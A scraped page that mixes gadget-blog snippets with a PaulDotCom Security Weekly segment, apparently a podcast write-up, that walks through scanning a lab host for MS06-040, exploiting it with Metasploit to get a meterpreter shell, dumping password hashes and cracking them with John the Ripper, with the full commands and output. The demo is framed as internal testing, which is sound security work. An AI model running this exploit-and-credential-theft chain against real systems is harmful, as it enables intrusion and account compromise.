Filed under: Handhelds
[Via Gadget Lab]
Read | Permalink | Email this | Comments
Filed under: Handhelds
[Via Gadget Lab]
Read | Permalink | Email this | Comments
Filed under: Home Entertainment, Portable Audio
Nothing says sexy like a sleek wood trim, wouldn’t you wholeheartedly agree? Vita Audio obviously does, as it’s £499.99 ($980) R4 integrated music system just screams lavish. The all-in-one unit packs an iPod dock, slot-loading CD / MP3 / WMA-music disc player, USB port, DAB and FM tuner with RDS, front and rear auxiliary ports, built-in display, alarm clock function and the firm’s detachable RotoDial remote. For those not feeling the rich walnut veneer, there’s also a high-gloss white (surprised?) version available for £50 ($97) more. Sadly, the “coming soon” tidbit leaves us clueless as to how long you actually have left to save up for either of the pricey systems.
[Via ShinyShiny]
Read | Permalink | Email this | Comments
Episode106 – PaulDotCom Security Weekly
Tech Segment: Probe, Exploit, and Crack for Free
On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show 🙂 I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.
root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139
It reports:
Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ‘server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:
/framework-3.1/trunk gordon$ ./msfconsole
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::=[ msf v3.2-release
+ — –=[ 286 exploits – 124 payloads
+ — –=[ 17 encoders – 6 nops
=[ 62 auxI want to tell metasploit to use the following module:
msf > use windows/smb/ms06_040_netapi
I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:
msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcpI then tell metasploit what to target:
msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139
Here are what my options look like:
msf exploit(ms06_040_netapi) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.10.139 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options:
Name Current Setting Required Description
—- ————— ——– ———–
DLL /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local portExploit target:
Id Name
— —-
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)Now I tell metasploit to execute my exploit with the above options:
msf exploit(ms06_040_netapi) > exploit
[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)To access session 1 I use the following command:
msf exploit(ms06_040_netapi) > sessions -i 1
I then tell meterpreter to load the Sam Juicer module:
meterpreter > use -m Sam
Then I issue the “hashdump” command:
meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::So then I copy and paste those results into my other directory with John The Ripper Installed:
paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::Then I crack the passwords using the stock dictionary that comes with John:
paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session abortedW00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!
Microsoft has developed a small plug-in device that investigators can use to quickly extract forensic data from computers that may have been used in crimes.
“This is cool but also sucks”
The COFEE, which stands for Computer Online Forensic Evidence Extractor, is a USB “thumb drive” that was quietly distributed to a handful of law-enforcement agencies last June.
The next generation of web apps make heavy use of JavaScript and CSS. We
’ll show you how to make those apps responsive and quick.